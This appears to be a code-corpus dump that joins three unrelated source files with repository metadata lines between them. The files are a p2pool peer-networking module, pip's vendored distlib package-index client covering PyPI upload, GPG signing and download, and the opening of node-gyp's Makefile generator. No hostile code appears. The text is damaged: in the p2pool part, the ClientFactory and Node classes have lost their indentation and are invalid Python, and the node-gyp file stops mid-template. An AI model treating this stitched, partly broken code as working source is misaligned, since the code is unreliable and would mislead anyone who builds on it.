        self.node.lost_conn(proto, reason)
    def start(self):
        assert not self.running
        self.running = True
        # Retry binding until it succeeds (the port may still be held
        # by a previous instance).
        def attempt_listen():
            if self.running:
                self.listen_port = reactor.listenTCP(self.node.port, self)
        deferral.retry('Error binding to P2P port:', traceback=False)(attempt_listen)()
    def stop(self):
        assert self.running
        self.running = False
        return self.listen_port.stopListening()
class ClientFactory(protocol.ClientFactory):
def __init__(self, node, desired_conns, max_attempts):
self.node = node
self.desired_conns = desired_conns
self.max_attempts = max_attempts
self.attempts = set()
self.conns = set()
self.running = False
def _host_to_ident(self, host):
a, b, c, d = host.split('.')
return a, b
def buildProtocol(self, addr):
p = Protocol(self.node, False)
p.factory = self
return p
def startedConnecting(self, connector):
ident = self._host_to_ident(connector.getDestination().host)
if ident in self.attempts:
raise AssertionError('already have attempt')
self.attempts.add(ident)
def clientConnectionFailed(self, connector, reason):
self.attempts.remove(self._host_to_ident(connector.getDestination().host))
def clientConnectionLost(self, connector, reason):
self.attempts.remove(self._host_to_ident(connector.getDestination().host))
def proto_made_connection(self, proto):
pass
def proto_lost_connection(self, proto, reason):
pass
def proto_connected(self, proto):
self.conns.add(proto)
self.node.got_conn(proto)
def proto_disconnected(self, proto, reason):
self.conns.remove(proto)
self.node.lost_conn(proto, reason)
def start(self):
assert not self.running
self.running = True
self._stop_thinking = deferral.run_repeatedly(self._think)
def stop(self):
assert self.running
self.running = False
self._stop_thinking()
def _think(self):
try:
if len(self.conns) < self.desired_conns and len(self.attempts) < self.max_attempts and self.node.addr_store:
(host, port), = self.node.get_good_peers(1)
if self._host_to_ident(host) in self.attempts:
pass
elif host in self.node.bans and self.node.bans[host] > time.time():
pass
else:
#print 'Trying to connect to', host, port
reactor.connectTCP(host, port, self, timeout=5)
except:
log.err()
return random.expovariate(1/1)
class SingleClientFactory(protocol.ReconnectingClientFactory):
    # Maintains one persistent outgoing connection to a fixed address
    # (the node's connect_addrs), reconnecting with Twisted's
    # exponential backoff.
    def __init__(self, node):
        self.node = node
    def buildProtocol(self, addr):
        p = Protocol(self.node, incoming=False)
        p.factory = self
        return p
    def proto_made_connection(self, proto):
        pass
    def proto_lost_connection(self, proto, reason):
        pass
    def proto_connected(self, proto):
        # Reset the reconnect backoff after a successful handshake.
        self.resetDelay()
        self.node.got_conn(proto)
    def proto_disconnected(self, proto, reason):
        self.node.lost_conn(proto, reason)
class Node(object):
def __init__(self, best_share_hash_func, port, net, addr_store={}, connect_addrs=set(), desired_outgoing_conns=10, max_outgoing_attempts=30, max_incoming_conns=50, preferred_storage=1000, known_txs_var=variable.Variable({}), mining_txs_var=variable.Variable({}), advertise_ip=True):
self.best_share_hash_func = best_share_hash_func
self.port = port
self.net = net
self.addr_store = dict(addr_store)
self.connect_addrs = connect_addrs
self.preferred_storage = preferred_storage
self.known_txs_var = known_txs_var
self.mining_txs_var = mining_txs_var
self.advertise_ip = advertise_ip
self.traffic_happened = variable.Event()
self.nonce = random.randrange(2**64)
self.peers = {}
self.bans = {} # address -> end_time
self.clientfactory = ClientFactory(self, desired_outgoing_conns, max_outgoing_attempts)
self.serverfactory = ServerFactory(self, max_incoming_conns)
self.running = False
def start(self):
if self.running:
raise ValueError('already running')
self.clientfactory.start()
self.serverfactory.start()
self.singleclientconnectors = [reactor.connectTCP(addr, port, SingleClientFactory(self)) for addr, port in self.connect_addrs]
self.running = True
self._stop_thinking = deferral.run_repeatedly(self._think)
def _think(self):
try:
if len(self.addr_store) < self.preferred_storage and self.peers:
random.choice(self.peers.values()).send_getaddrs(count=8)
except:
log.err()
return random.expovariate(1/20)
@defer.inlineCallbacks
def stop(self):
if not self.running:
raise ValueError('already stopped')
self.running = False
self._stop_thinking()
yield self.clientfactory.stop()
yield self.serverfactory.stop()
for singleclientconnector in self.singleclientconnectors:
yield singleclientconnector.factory.stopTrying()
yield singleclientconnector.disconnect()
del self.singleclientconnectors
def got_conn(self, conn):
if conn.nonce in self.peers:
raise ValueError('already have peer')
self.peers[conn.nonce] = conn
print '%s connection to peer %s:%i established. p2pool version: %i %r' % ('Incoming' if conn.incoming else 'Outgoing', conn.addr[0], conn.addr[1], conn.other_version, conn.other_sub_version)
def lost_conn(self, conn, reason):
if conn.nonce not in self.peers:
raise ValueError('''don't have peer''')
if conn is not self.peers[conn.nonce]:
raise ValueError('wrong conn')
del self.peers[conn.nonce]
print 'Lost peer %s:%i - %s' % (conn.addr[0], conn.addr[1], reason.getErrorMessage())
def got_addr(self, (host, port), services, timestamp):
if (host, port) in self.addr_store:
old_services, old_first_seen, old_last_seen = self.addr_store[host, port]
self.addr_store[host, port] = services, old_first_seen, max(old_last_seen, timestamp)
else:
if len(self.addr_store) < 10000:
self.addr_store[host, port] = services, timestamp, timestamp
def handle_shares(self, shares, peer):
print 'handle_shares', (shares, peer)
def handle_share_hashes(self, hashes, peer):
print 'handle_share_hashes', (hashes, peer)
def handle_get_shares(self, hashes, parents, stops, peer):
print 'handle_get_shares', (hashes, parents, stops, peer)
def handle_bestblock(self, header, peer):
print 'handle_bestblock', header
def get_good_peers(self, max_count):
t = time.time()
return [x[0] for x in sorted(self.addr_store.iteritems(), key=lambda (k, (services, first_seen, last_seen)):
-math.log(max(3600, last_seen - first_seen))/math.log(max(3600, t - last_seen))*random.expovariate(1)
)][:max_count]
| gpl-3.0 |
James-Firth/pip | pip/_vendor/distlib/index.py | 571 | 20976 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
# Module-level logger for this module.
logger = logging.getLogger(__name__)
# Defaults used when the caller supplies no index URL / auth realm.
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
    """
    This class represents a package index compatible with PyPI, the Python
    Package Index.
    """
    # Fixed MIME multipart boundary used by encode_request() when posting
    # form fields and files to the index.
    boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
    def __init__(self, url=None):
        """
        Initialise an instance.
        :param url: The URL of the index. If not specified, the URL for PyPI is
                    used.
        """
        self.url = url or DEFAULT_INDEX
        self.read_configuration()
        scheme, netloc, path, params, query, frag = urlparse(self.url)
        if params or query or frag or scheme not in ('http', 'https'):
            raise DistlibException('invalid repository: %s' % self.url)
        self.password_handler = None
        self.ssl_verifier = None
        self.gpg = None
        self.gpg_home = None
        self.rpc_proxy = None
        # Probe for an available GnuPG executable (preferring gpg2) by
        # running "<binary> --version" with output discarded; self.gpg stays
        # None if neither binary can be launched.
        with open(os.devnull, 'w') as sink:
            for s in ('gpg2', 'gpg'):
                try:
                    rc = subprocess.check_call([s, '--version'], stdout=sink,
                                               stderr=sink)
                    if rc == 0:
                        self.gpg = s
                        break
                except OSError:
                    pass
    def _get_pypirc_command(self):
        """
        Get the distutils command for interacting with PyPI configurations.
        :return: the command.
        """
        from distutils.core import Distribution
        from distutils.config import PyPIRCCommand
        d = Distribution()
        return PyPIRCCommand(d)
    def read_configuration(self):
        """
        Read the PyPI access configuration as supported by distutils, getting
        PyPI to do the actual work. This populates ``username``, ``password``,
        ``realm`` and ``url`` attributes from the configuration.
        """
        # get distutils to do the work
        c = self._get_pypirc_command()
        c.repository = self.url
        cfg = c._read_pypirc()
        self.username = cfg.get('username')
        self.password = cfg.get('password')
        self.realm = cfg.get('realm', 'pypi')
        self.url = cfg.get('repository', self.url)
    def save_configuration(self):
        """
        Save the PyPI access configuration. You must have set ``username`` and
        ``password`` attributes before calling this method.
        Again, distutils is used to do the actual work.
        """
        self.check_credentials()
        # get distutils to do the work
        c = self._get_pypirc_command()
        c._store_pypirc(self.username, self.password)
    def check_credentials(self):
        """
        Check that ``username`` and ``password`` have been set, and raise an
        exception if not.
        """
        if self.username is None or self.password is None:
            raise DistlibException('username and password must be set')
        # Also (re)build the HTTP Basic auth handler that send_request()
        # installs on its opener.
        pm = HTTPPasswordMgr()
        _, netloc, _, _, _, _ = urlparse(self.url)
        pm.add_password(self.realm, netloc, self.username, self.password)
        self.password_handler = HTTPBasicAuthHandler(pm)
    def register(self, metadata):
        """
        Register a distribution on PyPI, using the provided metadata.
        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the distribution to be
                         registered.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        metadata.validate()
        d = metadata.todict()
        # Legacy PyPI two-step: first ask the server to 'verify' the
        # metadata, then 'submit' it for registration.
        d[':action'] = 'verify'
        request = self.encode_request(d.items(), [])
        response = self.send_request(request)
        d[':action'] = 'submit'
        request = self.encode_request(d.items(), [])
        return self.send_request(request)
    def _reader(self, name, stream, outbuf):
        """
        Thread runner for reading lines of from a subprocess into a buffer.
        :param name: The logical name of the stream (used for logging only).
        :param stream: The stream to read from. This will typically a pipe
                       connected to the output stream of a subprocess.
        :param outbuf: The list to append the read lines to.
        """
        while True:
            s = stream.readline()
            if not s:
                break
            s = s.decode('utf-8').rstrip()
            outbuf.append(s)
            logger.debug('%s: %s' % (name, s))
        stream.close()
    def get_sign_command(self, filename, signer, sign_password,
                         keystore=None):
        """
        Return a suitable command for signing a file.
        :param filename: The pathname to the file to be signed.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param keystore: The path to a directory which contains the keys
                         used in verification. If not specified, the
                         instance's ``gpg_home`` attribute is used instead.
        :return: The signing command as a list suitable to be
                 passed to :class:`subprocess.Popen`.
        """
        cmd = [self.gpg, '--status-fd', '2', '--no-tty']
        if keystore is None:
            keystore = self.gpg_home
        if keystore:
            cmd.extend(['--homedir', keystore])
        if sign_password is not None:
            # Passphrase will be fed to gpg on stdin (fd 0) by run_command().
            cmd.extend(['--batch', '--passphrase-fd', '0'])
        # The detached signature is written into a fresh temp directory; the
        # caller is responsible for cleaning it up (see upload_file()).
        td = tempfile.mkdtemp()
        sf = os.path.join(td, os.path.basename(filename) + '.asc')
        cmd.extend(['--detach-sign', '--armor', '--local-user',
                    signer, '--output', sf, filename])
        logger.debug('invoking: %s', ' '.join(cmd))
        return cmd, sf
    def run_command(self, cmd, input_data=None):
        """
        Run a command in a child process , passing it any input data specified.
        :param cmd: The command to run.
        :param input_data: If specified, this must be a byte string containing
                           data to be sent to the child process.
        :return: A tuple consisting of the subprocess' exit code, a list of
                 lines read from the subprocess' ``stdout``, and a list of
                 lines read from the subprocess' ``stderr``.
        """
        kwargs = {
            'stdout': subprocess.PIPE,
            'stderr': subprocess.PIPE,
        }
        if input_data is not None:
            kwargs['stdin'] = subprocess.PIPE
        stdout = []
        stderr = []
        p = subprocess.Popen(cmd, **kwargs)
        # We don't use communicate() here because we may need to
        # get clever with interacting with the command
        t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
        t1.start()
        t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
        t2.start()
        if input_data is not None:
            p.stdin.write(input_data)
            p.stdin.close()
        p.wait()
        t1.join()
        t2.join()
        return p.returncode, stdout, stderr
    def sign_file(self, filename, signer, sign_password, keystore=None):
        """
        Sign a file.
        :param filename: The pathname to the file to be signed.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param keystore: The path to a directory which contains the keys
                         used in signing. If not specified, the instance's
                         ``gpg_home`` attribute is used instead.
        :return: The absolute pathname of the file where the signature is
                 stored.
        """
        cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
                                              keystore)
        rc, stdout, stderr = self.run_command(cmd,
                                              sign_password.encode('utf-8'))
        if rc != 0:
            raise DistlibException('sign command failed with error '
                                   'code %s' % rc)
        return sig_file
    def upload_file(self, metadata, filename, signer=None, sign_password=None,
                    filetype='sdist', pyversion='source', keystore=None):
        """
        Upload a release file to the index.
        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the file to be uploaded.
        :param filename: The pathname of the file to be uploaded.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param filetype: The type of the file being uploaded. This is the
                        distutils command which produced that file, e.g.
                        ``sdist`` or ``bdist_wheel``.
        :param pyversion: The version of Python which the release relates
                          to. For code compatible with any Python, this would
                          be ``source``, otherwise it would be e.g. ``3.2``.
        :param keystore: The path to a directory which contains the keys
                         used in signing. If not specified, the instance's
                         ``gpg_home`` attribute is used instead.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        if not os.path.exists(filename):
            raise DistlibException('not found: %s' % filename)
        metadata.validate()
        d = metadata.todict()
        sig_file = None
        if signer:
            if not self.gpg:
                logger.warning('no signing program available - not signed')
            else:
                sig_file = self.sign_file(filename, signer, sign_password,
                                          keystore)
        with open(filename, 'rb') as f:
            file_data = f.read()
        md5_digest = hashlib.md5(file_data).hexdigest()
        sha256_digest = hashlib.sha256(file_data).hexdigest()
        d.update({
            ':action': 'file_upload',
            # NOTE(review): 'protcol_version' (sic) looks misspelled, but it
            # matches the field name the legacy PyPI upload API historically
            # expected -- confirm server-side before "fixing" it.
            'protcol_version': '1',
            'filetype': filetype,
            'pyversion': pyversion,
            'md5_digest': md5_digest,
            'sha256_digest': sha256_digest,
        })
        files = [('content', os.path.basename(filename), file_data)]
        if sig_file:
            with open(sig_file, 'rb') as f:
                sig_data = f.read()
            files.append(('gpg_signature', os.path.basename(sig_file),
                          sig_data))
            # Remove the temp dir created by get_sign_command().
            shutil.rmtree(os.path.dirname(sig_file))
        request = self.encode_request(d.items(), files)
        return self.send_request(request)
    def upload_documentation(self, metadata, doc_dir):
        """
        Upload documentation to the index.
        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the documentation to be
                         uploaded.
        :param doc_dir: The pathname of the directory which contains the
                        documentation. This should be the directory that
                        contains the ``index.html`` for the documentation.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        if not os.path.isdir(doc_dir):
            raise DistlibException('not a directory: %r' % doc_dir)
        fn = os.path.join(doc_dir, 'index.html')
        if not os.path.exists(fn):
            raise DistlibException('not found: %r' % fn)
        metadata.validate()
        name, version = metadata.name, metadata.version
        # The whole documentation tree is zipped in memory and posted as a
        # single 'content' file.
        zip_data = zip_dir(doc_dir).getvalue()
        fields = [(':action', 'doc_upload'),
                  ('name', name), ('version', version)]
        files = [('content', name, zip_data)]
        request = self.encode_request(fields, files)
        return self.send_request(request)
    def get_verify_command(self, signature_filename, data_filename,
                           keystore=None):
        """
        Return a suitable command for verifying a file.
        :param signature_filename: The pathname to the file containing the
                                   signature.
        :param data_filename: The pathname to the file containing the
                              signed data.
        :param keystore: The path to a directory which contains the keys
                         used in verification. If not specified, the
                         instance's ``gpg_home`` attribute is used instead.
        :return: The verifying command as a list suitable to be
                 passed to :class:`subprocess.Popen`.
        """
        cmd = [self.gpg, '--status-fd', '2', '--no-tty']
        if keystore is None:
            keystore = self.gpg_home
        if keystore:
            cmd.extend(['--homedir', keystore])
        cmd.extend(['--verify', signature_filename, data_filename])
        logger.debug('invoking: %s', ' '.join(cmd))
        return cmd
    def verify_signature(self, signature_filename, data_filename,
                         keystore=None):
        """
        Verify a signature for a file.
        :param signature_filename: The pathname to the file containing the
                                   signature.
        :param data_filename: The pathname to the file containing the
                              signed data.
        :param keystore: The path to a directory which contains the keys
                         used in verification. If not specified, the
                         instance's ``gpg_home`` attribute is used instead.
        :return: True if the signature was verified, else False.
        """
        if not self.gpg:
            raise DistlibException('verification unavailable because gpg '
                                   'unavailable')
        cmd = self.get_verify_command(signature_filename, data_filename,
                                      keystore)
        rc, stdout, stderr = self.run_command(cmd)
        # gpg exits 0 for a good signature and 1 for a bad one; anything
        # else indicates the command itself failed.
        if rc not in (0, 1):
            raise DistlibException('verify command failed with error '
                             'code %s' % rc)
        return rc == 0
    def download_file(self, url, destfile, digest=None, reporthook=None):
        """
        This is a convenience method for downloading a file from an URL.
        Normally, this will be a file from the index, though currently
        no check is made for this (i.e. a file can be downloaded from
        anywhere).
        The method is just like the :func:`urlretrieve` function in the
        standard library, except that it allows digest computation to be
        done during download and checking that the downloaded data
        matched any expected value.
        :param url: The URL of the file to be downloaded (assumed to be
                    available via an HTTP GET request).
        :param destfile: The pathname where the downloaded file is to be
                         saved.
        :param digest: If specified, this must be a (hasher, value)
                       tuple, where hasher is the algorithm used (e.g.
                       ``'md5'``) and ``value`` is the expected value.
        :param reporthook: The same as for :func:`urlretrieve` in the
                           standard library.
        """
        if digest is None:
            digester = None
            logger.debug('No digest specified')
        else:
            if isinstance(digest, (list, tuple)):
                hasher, digest = digest
            else:
                # A bare digest string is assumed to be MD5.
                hasher = 'md5'
            digester = getattr(hashlib, hasher)()
            logger.debug('Digest specified: %s' % digest)
        # The following code is equivalent to urlretrieve.
        # We need to do it this way so that we can compute the
        # digest of the file as we go.
        with open(destfile, 'wb') as dfp:
            # addinfourl is not a context manager on 2.x
            # so we have to use try/finally
            sfp = self.send_request(Request(url))
            try:
                headers = sfp.info()
                blocksize = 8192
                size = -1
                read = 0
                blocknum = 0
                if "content-length" in headers:
                    size = int(headers["Content-Length"])
                if reporthook:
                    reporthook(blocknum, blocksize, size)
                while True:
                    block = sfp.read(blocksize)
                    if not block:
                        break
                    read += len(block)
                    dfp.write(block)
                    if digester:
                        digester.update(block)
                    blocknum += 1
                    if reporthook:
                        reporthook(blocknum, blocksize, size)
            finally:
                sfp.close()
        # check that we got the whole file, if we can
        if size >= 0 and read < size:
            raise DistlibException(
                'retrieval incomplete: got only %d out of %d bytes'
                % (read, size))
        # if we have a digest, it must match.
        if digester:
            actual = digester.hexdigest()
            if digest != actual:
                raise DistlibException('%s digest mismatch for %s: expected '
                                       '%s, got %s' % (hasher, destfile,
                                                       digest, actual))
            logger.debug('Digest verified: %s', digest)
    def send_request(self, req):
        """
        Send a standard library :class:`Request` to PyPI and return its
        response.
        :param req: The request to send.
        :return: The HTTP response from PyPI (a standard library HTTPResponse).
        """
        # Install whichever auth / SSL-verification handlers have been
        # configured on this instance.
        handlers = []
        if self.password_handler:
            handlers.append(self.password_handler)
        if self.ssl_verifier:
            handlers.append(self.ssl_verifier)
        opener = build_opener(*handlers)
        return opener.open(req)
    def encode_request(self, fields, files):
        """
        Encode fields and files for posting to an HTTP server.
        :param fields: The fields to send as a list of (fieldname, value)
                       tuples.
        :param files: The files to send as a list of (fieldname, filename,
                      file_bytes) tuple.
        """
        # Adapted from packaging, which in turn was adapted from
        # http://code.activestate.com/recipes/146306
        parts = []
        boundary = self.boundary
        for k, values in fields:
            if not isinstance(values, (list, tuple)):
                values = [values]
            for v in values:
                parts.extend((
                    b'--' + boundary,
                    ('Content-Disposition: form-data; name="%s"' %
                     k).encode('utf-8'),
                    b'',
                    v.encode('utf-8')))
        for key, filename, value in files:
            parts.extend((
                b'--' + boundary,
                ('Content-Disposition: form-data; name="%s"; filename="%s"' %
                 (key, filename)).encode('utf-8'),
                b'',
                value))
        parts.extend((b'--' + boundary + b'--', b''))
        body = b'\r\n'.join(parts)
        ct = b'multipart/form-data; boundary=' + boundary
        headers = {
            'Content-type': ct,
            'Content-length': str(len(body))
        }
        return Request(self.url, body, headers)
    def search(self, terms, operator=None):
        """
        Search the index via its XML-RPC interface.
        :param terms: Either a search string (matched against the project
                      name) or a dict mapping field names to search values.
        :param operator: How the server should combine multiple criteria;
                         passed through as-is, defaulting to 'and'.
        :return: Whatever the index's XML-RPC ``search`` method returns.
        """
        if isinstance(terms, string_types):
            terms = {'name': terms}
        # Lazily create and cache the XML-RPC proxy across calls.
        if self.rpc_proxy is None:
            self.rpc_proxy = ServerProxy(self.url, timeout=3.0)
        return self.rpc_proxy.search(terms, operator or 'and')
| mit |
zwahf1/Thesis | GlucoMan/node_modules/node-gyp/gyp/pylib/gyp/generator/make.py | 896 | 91092 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Notes:
#
# This is all roughly based on the Makefile system used by the Linux
# kernel, but is a non-recursive make -- we put the entire dependency
# graph in front of make and let it figure it out.
#
# The code below generates a separate .mk file for each target, but
# all are sourced by the top-level Makefile. This means that all
# variables in .mk-files clobber one another. Be careful to use :=
# where appropriate for immediate evaluation, and similarly to watch
# that you're not relying on a variable value to last beween different
# .mk files.
#
# TODOs:
#
# Global settings and utility functions are currently stuffed in the
# toplevel Makefile. It may make sense to generate some .mk files on
# the side to keep the the files readable.
import os
import re
import sys
import subprocess
import gyp
import gyp.common
import gyp.xcode_emulation
from gyp.common import GetEnvironFallback
from gyp.common import GypError
# Expansion variables this generator supplies to gyp. Most values are Make
# variable references that are substituted into the generated makefiles and
# only expanded by make at build time (exceptions are noted inline).
generator_default_variables = {
  'EXECUTABLE_PREFIX': '',
  'EXECUTABLE_SUFFIX': '',
  'STATIC_LIB_PREFIX': 'lib',
  'SHARED_LIB_PREFIX': 'lib',
  'STATIC_LIB_SUFFIX': '.a',
  'INTERMEDIATE_DIR': '$(obj).$(TOOLSET)/$(TARGET)/geni',
  'SHARED_INTERMEDIATE_DIR': '$(obj)/gen',
  'PRODUCT_DIR': '$(builddir)',
  'RULE_INPUT_ROOT': '%(INPUT_ROOT)s', # This gets expanded by Python.
  'RULE_INPUT_DIRNAME': '%(INPUT_DIRNAME)s', # This gets expanded by Python.
  'RULE_INPUT_PATH': '$(abspath $<)',
  'RULE_INPUT_EXT': '$(suffix $<)',
  'RULE_INPUT_NAME': '$(notdir $<)',
  'CONFIGURATION_NAME': '$(BUILDTYPE)',
}
# Make supports multiple toolsets
generator_supports_multiple_toolsets = True
# Request sorted dependencies in the order from dependents to dependencies.
generator_wants_sorted_dependencies = False
# Placates pylint.
generator_additional_non_configuration_keys = []
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
# Populated by CalculateGeneratorInputInfo() below.
generator_filelist_paths = None
def CalculateVariables(default_variables, params):
  """Calculate additional variables for use in the build (called by gyp)."""
  # setdefault() throughout: only fill in values the caller has not already
  # provided.
  flavor = gyp.common.GetFlavor(params)
  if flavor == 'mac':
    default_variables.setdefault('OS', 'mac')
    default_variables.setdefault('SHARED_LIB_SUFFIX', '.dylib')
    default_variables.setdefault('SHARED_LIB_DIR',
                                 generator_default_variables['PRODUCT_DIR'])
    default_variables.setdefault('LIB_DIR',
                                 generator_default_variables['PRODUCT_DIR'])
    # Copy additional generator configuration data from Xcode, which is shared
    # by the Mac Make generator.
    import gyp.generator.xcode as xcode_generator
    global generator_additional_non_configuration_keys
    generator_additional_non_configuration_keys = getattr(xcode_generator,
        'generator_additional_non_configuration_keys', [])
    global generator_additional_path_sections
    generator_additional_path_sections = getattr(xcode_generator,
        'generator_additional_path_sections', [])
    global generator_extra_sources_for_rules
    generator_extra_sources_for_rules = getattr(xcode_generator,
        'generator_extra_sources_for_rules', [])
    # NOTE(review): COMPILABLE_EXTENSIONS is a module-level table defined
    # elsewhere in this file; Objective-C(++) sources become compilable on Mac.
    COMPILABLE_EXTENSIONS.update({'.m': 'objc', '.mm' : 'objcxx'})
  else:
    operating_system = flavor
    if flavor == 'android':
      operating_system = 'linux' # Keep this legacy behavior for now.
    default_variables.setdefault('OS', operating_system)
    default_variables.setdefault('SHARED_LIB_SUFFIX', '.so')
    default_variables.setdefault('SHARED_LIB_DIR','$(builddir)/lib.$(TOOLSET)')
    default_variables.setdefault('LIB_DIR', '$(obj).$(TOOLSET)')
def CalculateGeneratorInputInfo(params):
  """Calculate the generator specific info that gets fed to input (called by
  gyp)."""
  flags = params.get('generator_flags', {})
  # Building against the Android NDK requires a strict link order.
  if flags.get('android_ndk_version', None):
    global generator_wants_sorted_dependencies
    generator_wants_sorted_dependencies = True
  options = params['options']
  base_dir = options.generator_output or options.toplevel_dir
  out_name = flags.get('output_dir', 'out')
  global generator_filelist_paths
  generator_filelist_paths = {
    'toplevel': options.toplevel_dir,
    'qualified_out_dir':
        os.path.normpath(os.path.join(base_dir, out_name, 'gypfiles')),
  }
# The .d checking code below uses these functions:
# wildcard, sort, foreach, shell, wordlist
# wildcard can handle spaces, the rest can't.
# Since I could find no way to make foreach work with spaces in filenames
# correctly, the .d files have spaces replaced with another character. The .d
# file for
# Chromium\ Framework.framework/foo
# is for example
# out/Release/.deps/out/Release/Chromium?Framework.framework/foo
# This is the replacement character.
SPACE_REPLACEMENT = '?'
# Makefile recipe templates (quiet_cmd_*/cmd_* pairs) for archiving and
# linking, interpolated into the generated Makefile; one variant per target
# platform.
LINK_COMMANDS_LINUX = """\
quiet_cmd_alink = AR($(TOOLSET)) $@
cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
quiet_cmd_alink_thin = AR($(TOOLSET)) $@
cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crsT $@ $(filter %.o,$^)
# Due to circular dependencies between libraries :(, we wrap the
# special "figure out circular dependencies" flags around the entire
# input list during linking.
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
# We support two kinds of shared objects (.so):
# 1) shared_library, which is just bundling together many dependent libraries
# into a link line.
# 2) loadable_module, which is generating a module intended for dlopen().
#
# They differ only slightly:
# In the former case, we want to package all dependent code into the .so.
# In the latter case, we want to package just the API exposed by the
# outermost module.
# This means shared_library uses --whole-archive, while loadable_module doesn't.
# (Note that --whole-archive is incompatible with the --start-group used in
# normal linking.)
# Other shared-object link notes:
# - Set SONAME to the library filename so our binaries don't reference
# the local, absolute paths used on the link command-line.
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
"""
LINK_COMMANDS_MAC = """\
quiet_cmd_alink = LIBTOOL-STATIC $@
cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -bundle $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(filter-out FORCE_DO_CMD, $^) $(LIBS)
"""
LINK_COMMANDS_ANDROID = """\
quiet_cmd_alink = AR($(TOOLSET)) $@
cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
quiet_cmd_alink_thin = AR($(TOOLSET)) $@
cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crsT $@ $(filter %.o,$^)
# Due to circular dependencies between libraries :(, we wrap the
# special "figure out circular dependencies" flags around the entire
# input list during linking.
quiet_cmd_link = LINK($(TOOLSET)) $@
quiet_cmd_link_host = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
cmd_link_host = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(LD_INPUTS) $(LIBS)
# Other shared-object link notes:
# - Set SONAME to the library filename so our binaries don't reference
# the local, absolute paths used on the link command-line.
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
quiet_cmd_solink_module_host = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module_host = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ $(filter-out FORCE_DO_CMD, $^) $(LIBS)
"""
LINK_COMMANDS_AIX = """\
quiet_cmd_alink = AR($(TOOLSET)) $@
cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) -X32_64 crs $@ $(filter %.o,$^)
quiet_cmd_alink_thin = AR($(TOOLSET)) $@
